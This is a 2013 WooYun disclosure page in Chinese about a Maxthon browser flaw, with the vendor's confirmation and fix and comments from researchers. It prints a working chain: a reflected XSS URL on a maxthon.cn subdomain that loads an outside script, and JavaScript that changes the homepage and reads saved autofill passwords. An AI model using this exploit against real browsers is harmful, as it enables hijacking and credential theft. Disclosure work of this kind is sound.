当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-033365

漏洞标题:傲游云浏览器漏洞造成可以远程控制浏览器

相关厂商:傲游

漏洞作者: 心伤的胖子

提交时间:2013-08-03 08:21

修复时间:2013-11-01 08:22

公开时间:2013-11-01 08:22

漏洞类型:设计错误/逻辑缺陷

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-08-03: 细节已通知厂商并且等待厂商处理中
2013-08-05: 厂商已经确认,细节仅向厂商公开
2013-08-08: 细节向第三方安全合作伙伴开放
2013-09-29: 细节向核心白帽子及相关领域专家公开
2013-10-09: 细节向普通白帽子公开
2013-10-19: 细节向实习白帽子公开
2013-11-01: 细节向公众公开

简要描述:

傲游云浏览器漏洞造成可以远程修改浏览器的设计,以及获取浏览器的数据,达到控制浏览器的目的。

详细说明:

测试版本:v4.1.0.4000
傲游浏览器设置功能是通过 html 代码实现的,通过查看页面属性为:mx://res/options/index.htm,获取设置操作相关的代码就有机会控制浏览器。
查看源代码发现相关的 js 代码都在下面两个文件中:
mx://res/base/js/ext/mx.config.js
mx://res/options/js/all.js
对 js 代码分析发现所有的操作都在 maxthon 这个对象里面,在控制台里面查看下,如下图(对于文件操作、命令执行等高危函数不知道是做了限制还是给去掉了?):

mx1.png


结合 all.js 中的内容就可以写出修改浏览器设置的代码,以及获取浏览器历史纪录、自动表单填充中的密码等,但是要想完全控制浏览器就需要想办法让浏览器执行我们的代码,可以直接在其他域下放入相关代码是不行的,权限不够。如果 maxthon.cn 域是不是有权限呢,经过测试是可以的,如下图:

mx2.png


mx3.png


那只要在 maxthon.cn 任意一个域下找个 xss 就可以了,那么来了:
http://mm.maxthon.cn/feedback/feedback-list.php?deviceid=xxx&lang=x"><script src=http://www.a.com/mx.js?></script>
PS:貌似国内好多做浏览器的都没有考虑 xss 过滤器
http://www.a.com/mx.js 的代码为:

//修改主页
function bK(w, bR) {
    maxthon.browser.config.ConfigManager.set("maxthon.config", w, bR);
}
bK("browser.general.startpage","http://www.baidu.com/");
//获取自动表单填充用户密码
var str = "";
var forms = eval("(function(){return " + maxthon.browser.MagicFillService.getSavedPasswords() + ";})()");
for(form in forms){
    str = "url: " + forms[form]["form"]["origin"] + " | user: " + forms[form]["form"]["user_name_value"] + " | passwd: " + maxthon.browser.MagicFillService.showSavedPassword(forms[form]["form"]["password_value"]) + "\n" + str;
}
alert(str);


如下图:

mx4.png

漏洞证明:

如下图:

mx4.png

修复方案:

1、*.maxthon.cn 只要有 xss 就可以,可是怎么修的完?

版权声明:转载请注明来源 心伤的胖子@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-08-05 07:50

厂商回复:

感谢报告, 正在调整策略.

最新状态:

2013-08-13:站点已调整权限. 客户端部分修复.

2013-09-06:已修复. 谢谢帮助.

漏洞评价:

评论

  1. 2013-08-03 08:38 | VIP ( 普通白帽子 | Rank:759 漏洞数:100 )

    mark!!!!

  2. 2013-08-03 09:03 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    mark!!!!

  3. 2013-08-03 09:05 | mango ( 核心白帽子 | Rank:1668 漏洞数:248 | 我有个2b女友!)

    @VIP mark!!!!

  4. 2013-08-03 09:38 | 我是小号 ( 普通白帽子 | Rank:334 漏洞数:51 | Martin)

    @mango 好屌!是不是通用的啊?表示已经卸载了遨游,这个一直忽略白帽子们辛辛苦苦找到漏洞的浏览器

  5. 2013-08-03 09:50 | Blueheart ( 路人 | Rank:0 漏洞数:2 | 路人甲乙丙丁)

    前排围观,此贴必遭雷劈~~

  6. 2013-08-03 23:47 | blast ( 普通白帽子 | Rank:348 漏洞数:57 | 五仁委员会)

    漂亮!!!!

  7. 2013-08-03 23:47 | blast ( 普通白帽子 | Rank:348 漏洞数:57 | 五仁委员会)

    @我是小号 被忽略3次的路过。。

  8. 2013-08-04 06:52 | 我是小号 ( 普通白帽子 | Rank:334 漏洞数:51 | Martin)

    @blast 哈哈,成功为你复仇了~“感谢您的关注, 也感谢乌云的报告,除了最新的 7, 8 月份的几个, 其它应该都已修复.最新的几个没公开详细信息, 我会再关注下是否已修复. 很可能已修复了.很多乌云里面标已忽略的, 其实傲游已修复了相关问题, 只是没报给乌云.”傲游产品部的回复·····

  9. 2013-08-07 12:45 | 李白 ( 普通白帽子 | Rank:142 漏洞数:29 )

    表示,他们内部肯定被老板强制使用自家浏览器,这时候直接进去提权.